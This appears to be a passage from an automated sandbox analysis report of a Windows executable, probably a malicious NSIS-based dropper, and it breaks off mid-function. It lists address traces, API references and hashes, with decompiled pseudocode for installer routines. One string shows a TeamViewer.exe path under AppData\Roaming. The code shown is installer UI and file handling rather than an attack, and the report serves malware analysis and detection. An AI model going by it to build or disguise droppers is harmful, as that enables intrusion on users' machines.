                                                                                                                        0x00404da2
                                                                                                                        0x00404dae
                                                                                                                        0x00404dbd
                                                                                                                        0x00404dbd
                                                                                                                        0x00404dbf
                                                                                                                        0x00404dc2
                                                                                                                        0x00404dcb
                                                                                                                        0x00000000
                                                                                                                        0x00404cd2
                                                                                                                        0x00404cdd
                                                                                                                        0x00404ce0
                                                                                                                        0x00404ce5
                                                                                                                        0x00404ce7
                                                                                                                        0x00404ceb
                                                                                                                        0x00404cfb
                                                                                                                        0x00404d05
                                                                                                                        0x00404d07
                                                                                                                        0x00404d0a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00404ced
                                                                                                                        0x00404ced
                                                                                                                        0x00404cf3
                                                                                                                        0x00404cf5
                                                                                                                        0x00404cf5
                                                                                                                        0x00404cf6
                                                                                                                        0x00404cf7
                                                                                                                        0x00000000
                                                                                                                        0x00404ced
                                                                                                                        0x00404cd0
                                                                                                                        0x00404cb4
                                                                                                                        0x00404bf1
                                                                                                                        0x00000000
                                                                                                                        0x00404c07
                                                                                                                        0x00404c11
                                                                                                                        0x00404c16
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00404c28
                                                                                                                        0x00404c2d
                                                                                                                        0x00404c39
                                                                                                                        0x00404c39
                                                                                                                        0x00404c3b
                                                                                                                        0x00404c4a
                                                                                                                        0x00404c4c
                                                                                                                        0x00404c53
                                                                                                                        0x00404c56
                                                                                                                        0x00000000
                                                                                                                        0x00404c56
                                                                                                                        0x00404bf1
                                                                                                                        0x004048a7
                                                                                                                        0x004048ac
                                                                                                                        0x004048b6
                                                                                                                        0x004048b7
                                                                                                                        0x004048c0
                                                                                                                        0x004048cb
                                                                                                                        0x004048d6
                                                                                                                        0x004048dc
                                                                                                                        0x004048ea
                                                                                                                        0x004048f0
                                                                                                                        0x004048ff
                                                                                                                        0x00404904
                                                                                                                        0x0040490f
                                                                                                                        0x00404918
                                                                                                                        0x0040492d
                                                                                                                        0x0040493e
                                                                                                                        0x0040494b
                                                                                                                        0x0040494b
                                                                                                                        0x00404950
                                                                                                                        0x00404956
                                                                                                                        0x00404958
                                                                                                                        0x0040495b
                                                                                                                        0x00404960
                                                                                                                        0x00404965
                                                                                                                        0x00404967
                                                                                                                        0x00404967
                                                                                                                        0x00404987
                                                                                                                        0x00404987
                                                                                                                        0x00404989
                                                                                                                        0x0040498a
                                                                                                                        0x0040498f
                                                                                                                        0x00404992
                                                                                                                        0x00404995
                                                                                                                        0x00404999
                                                                                                                        0x0040499e
                                                                                                                        0x004049a3
                                                                                                                        0x004049a7
                                                                                                                        0x004049ac
                                                                                                                        0x004049b1
                                                                                                                        0x004049b3
                                                                                                                        0x004049bb
                                                                                                                        0x00404a85
                                                                                                                        0x00404a98
                                                                                                                        0x00000000
                                                                                                                        0x004049c1
                                                                                                                        0x004049c4
                                                                                                                        0x004049c7
                                                                                                                        0x004049ca
                                                                                                                        0x004049ca
                                                                                                                        0x004049d0
                                                                                                                        0x004049d6
                                                                                                                        0x004049d9
                                                                                                                        0x004049df
                                                                                                                        0x004049e0
                                                                                                                        0x004049e5
                                                                                                                        0x004049ee
                                                                                                                        0x004049f5
                                                                                                                        0x004049f8
                                                                                                                        0x004049fb
                                                                                                                        0x004049fe
                                                                                                                        0x00404a3a
                                                                                                                        0x00404a63
                                                                                                                        0x00404a3c
                                                                                                                        0x00404a49
                                                                                                                        0x00404a49
                                                                                                                        0x00404a00
                                                                                                                        0x00404a03
                                                                                                                        0x00404a12
                                                                                                                        0x00404a1c
                                                                                                                        0x00404a24
                                                                                                                        0x00404a2b
                                                                                                                        0x00404a33
                                                                                                                        0x00404a33
                                                                                                                        0x004049fe
                                                                                                                        0x00404a69
                                                                                                                        0x00404a6a
                                                                                                                        0x00404a76
                                                                                                                        0x00404a76
                                                                                                                        0x00404a83
                                                                                                                        0x00404a9e
                                                                                                                        0x00404aa2
                                                                                                                        0x00404abf
                                                                                                                        0x00404ac4
                                                                                                                        0x00404ac7
                                                                                                                        0x00000000
                                                                                                                        0x00404aa4
                                                                                                                        0x00404aa9
                                                                                                                        0x00404ab2
                                                                                                                        0x00404e3f
                                                                                                                        0x00404e51
                                                                                                                        0x00404e51
                                                                                                                        0x00404aa2
                                                                                                                        0x00000000
                                                                                                                        0x00404a83
                                                                                                                        0x004049bb

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32 ref: 0040486A
                                                                                                                        • GetDlgItem.USER32 ref: 00404877
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004048C3
                                                                                                                        • LoadBitmapA.USER32 ref: 004048D6
                                                                                                                        • SetWindowLongA.USER32 ref: 004048F0
                                                                                                                        • 74191AB0.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404904
                                                                                                                        • 741923B0.COMCTL32(00000000,?,00FF00FF), ref: 00404918
                                                                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 0040492D
                                                                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404939
                                                                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040494B
                                                                                                                        • DeleteObject.GDI32(?), ref: 00404950
                                                                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040497B
                                                                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404987
                                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A1C
                                                                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A47
                                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A5B
                                                                                                                        • GetWindowLongA.USER32 ref: 00404A8A
                                                                                                                        • SetWindowLongA.USER32 ref: 00404A98
                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404AA9
                                                                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BAC
                                                                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C11
                                                                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C26
                                                                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C4A
                                                                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C70
                                                                                                                        • 74191F60.COMCTL32(?), ref: 00404C85
                                                                                                                        • GlobalFree.KERNEL32 ref: 00404C95
                                                                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D05
                                                                                                                        • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404DAE
                                                                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DBD
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404DDD
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404E2B
                                                                                                                        • GetDlgItem.USER32 ref: 00404E36
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00404E3D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ItemLongShow$74191Global$741923AllocBitmapDeleteFreeInvalidateLoadObjectRect
                                                                                                                        • String ID: $M$N
                                                                                                                        • API String ID: 1539750561-813528018
                                                                                                                        • Opcode ID: 9d7127013aa6371c945dd951bd4b8b5fe2ec9ac9385b3123730207c7727c871c
                                                                                                                        • Instruction ID: 91af9d563adbb526dddc39620d8b288a2aea1bcbb5731436b9e02a5cfbe7d22d
                                                                                                                        • Opcode Fuzzy Hash: 9d7127013aa6371c945dd951bd4b8b5fe2ec9ac9385b3123730207c7727c871c
                                                                                                                        • Instruction Fuzzy Hash: AB029FB0E00209AFDB21DF54DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 81%
                                                                                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				void* _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return  *0x407248(_a4, _a8, _a12, _t102);
			}













                                                                                                                        0x0040100a
                                                                                                                        0x00401039
                                                                                                                        0x00401047
                                                                                                                        0x0040104d
                                                                                                                        0x00401051
                                                                                                                        0x0040105b
                                                                                                                        0x00401061
                                                                                                                        0x00401064
                                                                                                                        0x004010f3
                                                                                                                        0x00401089
                                                                                                                        0x0040108c
                                                                                                                        0x004010a6
                                                                                                                        0x004010bd
                                                                                                                        0x004010cc
                                                                                                                        0x004010cf
                                                                                                                        0x004010d5
                                                                                                                        0x004010d9
                                                                                                                        0x004010e4
                                                                                                                        0x004010ed
                                                                                                                        0x004010ef
                                                                                                                        0x004010ef
                                                                                                                        0x00401100
                                                                                                                        0x00401105
                                                                                                                        0x0040110d
                                                                                                                        0x00401110
                                                                                                                        0x00401112
                                                                                                                        0x00401118
                                                                                                                        0x0040111f
                                                                                                                        0x00401126
                                                                                                                        0x00401130
                                                                                                                        0x00401142
                                                                                                                        0x00401156
                                                                                                                        0x00401160
                                                                                                                        0x00401165
                                                                                                                        0x00401165
                                                                                                                        0x00401110
                                                                                                                        0x0040116e
                                                                                                                        0x00000000
                                                                                                                        0x00401178
                                                                                                                        0x00401010
                                                                                                                        0x00401013
                                                                                                                        0x00401015
                                                                                                                        0x0040101f
                                                                                                                        0x0040101f
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • NtdllDefWindowProc_A.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                        • GetClientRect.USER32 ref: 0040105B
                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                        • FillRect.USER32 ref: 004010E4
                                                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                        • DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeNtdllProc_Window
                                                                                                                        • String ID: F
                                                                                                                        • API String ID: 2222205020-1304234792
                                                                                                                        • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                                                        • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                                                                                                                        • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                                                        • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404356, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 266stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 75%
                                                                                                                        			E00404356(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void _v72;
				struct _browseinfo _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				struct _ITEMIDLIST* _t123;
				intOrPtr* _t139;
				signed int* _t146;
				signed int _t149;
				signed int _t154;
				struct HWND__* _t160;
				CHAR* _t163;
				int _t164;

				_t81 =  *0x41fc70;
				_v36 = _t81;
				_t163 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040540B(0x3fb, _t163);
					E00405DC8(_t163);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040540B(0x3fb, _t163);
							if(E0040573A(_t181, _t163) == 0) {
								_v8 = 1;
							}
							E00405B66(0x41f468, _t163);
							_t146 = 0;
							_t86 = E00405E88(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405B66(0x41f468, _t163);
								_t88 = E004056ED(0x41f468);
								if(_t88 != _t146) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f468,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t154 = _a8;
									goto L37;
								} else {
									_t164 = 0x400;
									_t154 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f468) {
									L30:
									_t146 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f468,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t146 != 0) {
										 *_t146 =  *_t146 & _t113;
									}
									_t146 = E004056A0(_t113, 0x41f468) - 1;
									 *_t146 = 0x5c;
									if(_t146 != 0x41f468) {
										continue;
									} else {
										goto L30;
									}
								}
								_t154 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t146 = 0;
								L37:
								_t164 = 0x400;
								L38:
								_t94 = E004047A6(5);
								if(_v12 != _t146 && _t154 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t146) {
									E004046F1(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t146) {
										SetDlgItemTextA(_a4, _t164, 0x41f458);
									} else {
										E004046F1(_t164, 0xfffffffc, _t154);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t146) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t164) != 0) {
									_v8 = _t146;
								}
								E00403F3A(0 | _v8 == _t146);
								if(_v8 == _t146 &&  *0x42048c == _t146) {
									E004042EB();
								}
								 *0x42048c = _t146;
								goto L53;
							}
						}
						_t181 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t149 = 7;
							memset( &_v72, 0, _t149 << 2);
							_v76 = _a4;
							_v68 = 0x4204a0;
							_v56 = E0040468B;
							_v52 = _t163;
							_v64 = E00405B88(0x3fb, 0x4204a0, _t163, 0x41f870, _v8);
							_v60 = 0x41;
							_t123 = SHBrowseForFolder( &_v76);
							if(_t123 == 0) {
								_a8 = 0x40f;
							} else {
								E00405659( *0x407278(_t123), _t163);
								_t127 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t163 == 0x429400) {
									E00405B88(0x3fb, 0x4204a0, _t163, 0, _t127);
									_push(0x4204a0);
									_push(0x422e40);
									if( *0x4070f0() != 0) {
										_push(0x422e40);
										_push(_t163);
										L00405B82();
									}
								}
								 *0x42048c =  &(( *0x42048c)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t163);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t160 = _a4;
					_v12 = GetDlgItem(_t160, 0x3fb);
					if(E004056C6(_t163) != 0 && E004056ED(_t163) == 0) {
						E00405659(_t141, _t163);
					}
					 *0x423678 = _t160;
					SetWindowTextA(_v12, _t163);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403F18(_t160);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403F18(_t160);
					E00403F4D(_v12);
					_t139 = E00405E88(7);
					if(_t139 == 0) {
						L53:
						return E00403F7F(_a8, _a12, _a16);
					}
					 *_t139(_v12, 1);
					goto L8;
				}
			}






































                                                                                                                        0x0040435c
                                                                                                                        0x00404363
                                                                                                                        0x0040436f
                                                                                                                        0x0040437d
                                                                                                                        0x00404385
                                                                                                                        0x00404389
                                                                                                                        0x0040438f
                                                                                                                        0x0040438f
                                                                                                                        0x0040439b
                                                                                                                        0x0040440f
                                                                                                                        0x00404416
                                                                                                                        0x004044eb
                                                                                                                        0x004044f2
                                                                                                                        0x00404501
                                                                                                                        0x00404501
                                                                                                                        0x00404505
                                                                                                                        0x0040450b
                                                                                                                        0x00404518
                                                                                                                        0x0040451a
                                                                                                                        0x0040451a
                                                                                                                        0x00404528
                                                                                                                        0x0040452d
                                                                                                                        0x00404530
                                                                                                                        0x00404537
                                                                                                                        0x0040453a
                                                                                                                        0x00404571
                                                                                                                        0x00404573
                                                                                                                        0x00404579
                                                                                                                        0x00404580
                                                                                                                        0x00404582
                                                                                                                        0x00404582
                                                                                                                        0x0040459e
                                                                                                                        0x004045da
                                                                                                                        0x00000000
                                                                                                                        0x004045a0
                                                                                                                        0x004045a3
                                                                                                                        0x004045b7
                                                                                                                        0x004045b9
                                                                                                                        0x00000000
                                                                                                                        0x004045b9
                                                                                                                        0x0040453c
                                                                                                                        0x00404540
                                                                                                                        0x0040456f
                                                                                                                        0x0040456f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00404542
                                                                                                                        0x00404542
                                                                                                                        0x0040454f
                                                                                                                        0x00404554
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00404558
                                                                                                                        0x0040455a
                                                                                                                        0x0040455a
                                                                                                                        0x00404565
                                                                                                                        0x00404568
                                                                                                                        0x0040456d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040456d
                                                                                                                        0x004045c8
                                                                                                                        0x004045cf
                                                                                                                        0x004045d6
                                                                                                                        0x004045dd
                                                                                                                        0x004045dd
                                                                                                                        0x004045e2
                                                                                                                        0x004045e4
                                                                                                                        0x004045ec
                                                                                                                        0x004045f2
                                                                                                                        0x004045f2
                                                                                                                        0x00404602
                                                                                                                        0x0040460c
                                                                                                                        0x00404614
                                                                                                                        0x0040462a
                                                                                                                        0x00404616
                                                                                                                        0x0040461a
                                                                                                                        0x0040461a
                                                                                                                        0x00404614
                                                                                                                        0x0040462f
                                                                                                                        0x00404634
                                                                                                                        0x00404639
                                                                                                                        0x00404642
                                                                                                                        0x00404642
                                                                                                                        0x0040464b
                                                                                                                        0x0040464d
                                                                                                                        0x0040464d
                                                                                                                        0x00404659
                                                                                                                        0x00404661
                                                                                                                        0x0040466b
                                                                                                                        0x0040466b
                                                                                                                        0x00404670
                                                                                                                        0x00000000
                                                                                                                        0x00404670
                                                                                                                        0x0040453a
                                                                                                                        0x004044f4
                                                                                                                        0x004044fb
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004044fb
                                                                                                                        0x0040441c
                                                                                                                        0x00404422
                                                                                                                        0x0040443c
                                                                                                                        0x00404441
                                                                                                                        0x0040444b
                                                                                                                        0x00404452
                                                                                                                        0x00404461
                                                                                                                        0x00404464
                                                                                                                        0x00404467
                                                                                                                        0x0040446e
                                                                                                                        0x00404476
                                                                                                                        0x0040447d
                                                                                                                        0x00404484
                                                                                                                        0x0040448c
                                                                                                                        0x004044e4
                                                                                                                        0x0040448e
                                                                                                                        0x00404496
                                                                                                                        0x004044a0
                                                                                                                        0x004044a8
                                                                                                                        0x004044b5
                                                                                                                        0x004044ba
                                                                                                                        0x004044c0
                                                                                                                        0x004044c9
                                                                                                                        0x004044cb
                                                                                                                        0x004044cc
                                                                                                                        0x004044cd
                                                                                                                        0x004044cd
                                                                                                                        0x004044c9
                                                                                                                        0x004044d2
                                                                                                                        0x004044dd
                                                                                                                        0x004044dd
                                                                                                                        0x0040448c
                                                                                                                        0x00000000
                                                                                                                        0x00404441
                                                                                                                        0x0040442f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00404435
                                                                                                                        0x00000000
                                                                                                                        0x0040439d
                                                                                                                        0x0040439d
                                                                                                                        0x004043a9
                                                                                                                        0x004043b3
                                                                                                                        0x004043c0
                                                                                                                        0x004043c0
                                                                                                                        0x004043c6
                                                                                                                        0x004043cf
                                                                                                                        0x004043d8
                                                                                                                        0x004043db
                                                                                                                        0x004043de
                                                                                                                        0x004043e6
                                                                                                                        0x004043e9
                                                                                                                        0x004043ec
                                                                                                                        0x004043f4
                                                                                                                        0x004043fb
                                                                                                                        0x00404402
                                                                                                                        0x00404676
                                                                                                                        0x00404688
                                                                                                                        0x00404688
                                                                                                                        0x0040440d
                                                                                                                        0x00000000
                                                                                                                        0x0040440d

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32 ref: 004043A2
                                                                                                                        • SetWindowTextA.USER32(?,?), ref: 004043CF
                                                                                                                        • SHBrowseForFolder.SHELL32(?), ref: 00404484
                                                                                                                        • 762AA680.OLE32(00000000), ref: 0040448F
                                                                                                                        • lstrcmpi.KERNEL32 ref: 004044C1
                                                                                                                        • lstrcat.KERNEL32(?, "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe"), ref: 004044CD
                                                                                                                        • SetDlgItemTextA.USER32 ref: 004044DD
                                                                                                                          • Part of subcall function 0040540B: GetDlgItemTextA.USER32 ref: 0040541E
                                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                                          • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(0041F468,?,?,0000040F,?,0041F468,0041F468,?,00000000,0041F468,?,?,000003FB,?), ref: 00404596
                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B1
                                                                                                                        • SetDlgItemTextA.USER32 ref: 0040462A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CharItemText$Next$A680BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
                                                                                                                        • String ID: "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe"$A
                                                                                                                        • API String ID: 1371326663-1470638881
                                                                                                                        • Opcode ID: 3cdee0d3b15a5f473c4b90c9f3f5b15abf96d87614e60a3eade95cc215b2791d
                                                                                                                        • Instruction ID: fa341535892c43c3a67d7fcafb17cb6574160925603278dae289bcadb551eaae
                                                                                                                        • Opcode Fuzzy Hash: 3cdee0d3b15a5f473c4b90c9f3f5b15abf96d87614e60a3eade95cc215b2791d
                                                                                                                        • Instruction Fuzzy Hash: 2D9170B1900218BBDB11AFA1CD84AAF7BB8EF45314F10847BF704B6291D77C9A41DB59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040548B, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E0040548B(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				void* _t38;
				char* _t46;
				signed int _t49;
				signed int _t52;
				signed int _t58;
				signed int _t59;
				void* _t61;
				signed int _t64;
				void* _t66;
				CHAR* _t68;
				char* _t71;

				_t68 = _a4;
				_t37 = E0040573A(__eflags, _t68);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t59 = DeleteFileA(_t68);
					asm("sbb eax, eax");
					_t61 =  ~_t59 + 1;
					 *0x423f28 =  *0x423f28 + _t61;
					return _t61;
				}
				_t64 = _a8 & 0x00000001;
				__eflags = _t64;
				_v8 = _t64;
				if(_t64 == 0) {
					L5:
					_t38 = E00405B66(0x4214a8, _t68);
					__eflags = _t64;
					if(_t64 == 0) {
						_t38 = E004056A0(_t38, _t68);
					} else {
						_push("\*.*");
						_push(0x4214a8);
						L00405B82();
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						_push(0x409010);
						_push(_t68);
						L00405B82();
